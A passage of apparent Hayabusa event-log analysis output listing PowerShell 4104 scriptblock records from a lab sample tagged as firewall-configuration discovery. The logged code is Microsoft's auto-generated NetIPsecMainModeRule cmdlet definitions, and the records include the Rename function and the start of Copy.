[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] 